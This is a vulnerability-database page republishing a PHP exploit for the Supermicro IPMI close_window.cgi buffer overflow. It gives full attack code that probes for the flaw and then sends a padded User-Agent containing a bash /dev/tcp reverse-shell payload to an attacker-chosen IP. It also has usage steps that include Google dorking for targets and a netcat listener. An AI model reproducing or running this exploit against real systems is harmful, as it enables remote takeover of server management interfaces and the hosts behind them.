Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Supermicro Onboard IPMI X9SCL / X9SCM SMT_X9_214 PHP Buffer Overflow

🗓️ 23 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 80 Views

PHP exploit for Supermicro IPMI SMT_X9_214 buffer overflow triggering reverse shell on vulnerable devices.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Supermicro Onboard IPMI close_window.cgi Buffer Overflow Vulnerability
17 Nov 201300:00
zdt
Circl		CVE-2013-3623
18 Nov 201300:00
circl
Check Point Advisories		Supermicro IPMI Firmware CGI Scanner Remote Code Execution (CVE-2013-3621; CVE-2013-3623)
12 Nov 201300:00
checkpoint_advisories
CVE		CVE-2013-3623
10 Dec 201316:00
cve
Cvelist		CVE-2013-3623
10 Dec 201316:00
cvelist
Exploit DB		Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)
18 Nov 201300:00
exploitdb
Metasploit		Supermicro Onboard IPMI CGI Vulnerability Scanner
6 Nov 201319:45
metasploit
Metasploit		Supermicro Onboard IPMI close_window.cgi Buffer Overflow
7 Nov 201320:59
metasploit
NVD		CVE-2013-3623
10 Dec 201316:11
nvd
Packet Storm		Supermicro Onboard IPMI close_window.cgi Buffer Overflow
17 Nov 201300:00
packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : Supermicro Onboard IPMI X9SCL X9SCM with firmware SMT_X9_214 PHP Buffer Overflow                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.supermicro.com                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is an exploit written in PHP, used to test and exploit the Buffer Overflow vulnerability in the Supermicro IPMI interface. 
    
        If the target is vulnerable to the attack (500 Internal Server Error), a Reverse Shell payload is sent to open a control shell on the target machine.
    
    [+] What's going on here?
    
        The target-ip and attacker (192.168.1.100:4444) are specified.
    
        Checks if the target is vulnerable (checkVulnerability()).
    
        If vulnerable, the Reverse Shell payload is sent.
    
    [+] Code Summary
    
       1 Sends an initial request to check for vulnerability.
    
       2 If the response is 500, a reverse connection command is sent via User-Agent.
    
       3️ Once the command reaches the victim device, a connection is opened to the attacker.
    
       4️ The attacker can now take full control of the device via nc -lvnp 4444.
    
    [+] save code as poc.php.
    
    [+] Set Target : line 80 // target ip 
    
                          81 // Put your IP address 
    					  
    					  82 // // Set the port you are listening on.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class SupermicroExploit {
        private $target_url;
        private $attacker_ip;
        private $attacker_port;
    
        public function __construct($url, $ip, $port) {
            $this->target_url = rtrim($url, '/');
            $this->attacker_ip = $ip;
            $this->attacker_port = $port;
        }
    
        public function sendCloseWindowRequest($sess, $agent = null) {
            if (!$agent) {
                $agent = $this->randomString(8);
            }
    
            $headers = [
                "User-Agent: " . $this->randomString(16) . $agent
            ];
    
            $data = [
                'sess_sid' => $sess
            ];
    
            return $this->sendPostRequest("/cgi/close_window.cgi", $data, $headers);
        }
    
        private function sendPostRequest($path, $data, $headers = []) {
            $url = $this->target_url . $path;
            $options = [
                'http' => [
                    'header'  => implode("\r\n", $headers) . "\r\nContent-type: application/x-www-form-urlencoded",
                    'method'  => 'POST',
                    'content' => http_build_query($data),
                ]
            ];
    
            $context  = stream_context_create($options);
            return file_get_contents($url, false, $context);
        }
    
        public function checkVulnerability() {
            $safe_check = $this->randomString(20);
            $trigger_check = $this->randomString(132);
    
            $res = $this->sendCloseWindowRequest($safe_check);
    
            if (!$res || strpos($res, "Can't find action") === false) {
                return "Unknown";
            }
    
            $res = $this->sendCloseWindowRequest($trigger_check);
    
            if (!$res || strpos($res, "500") === false) {
                return "Safe";
            }
    
            return "Vulnerable";
        }
    
        private function randomString($length) {
            return substr(str_shuffle(str_repeat($x='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)))), 1, $length);
        }
    
        public function exploit() {
            echo "Target is vulnerable! Sending reverse shell...\n";
            $buffer = $this->generatePayload();
            $this->sendCloseWindowRequest($buffer);
        }
    
        private function generatePayload() {
            $payload = "bash -i >& /dev/tcp/{$this->attacker_ip}/{$this->attacker_port} 0>&1";
            return str_repeat("A", 8000 - strlen($payload)) . $payload;
        }
    }
    
    $target_ip = "http://target-ip";
    $attacker_ip = "192.168.1.100"; 
    $attacker_port = "4444"; 
    
    $exploit = new SupermicroExploit($target_ip, $attacker_ip, $attacker_port);
    $status = $exploit->checkVulnerability();
    echo "Target is: $status\n";
    
    if ($status === "Vulnerable") {
        $exploit->exploit();
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Feb 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 210
EPSS0.8637
Supermicro management interfacebuffer overflow exploitreverse shell payload
80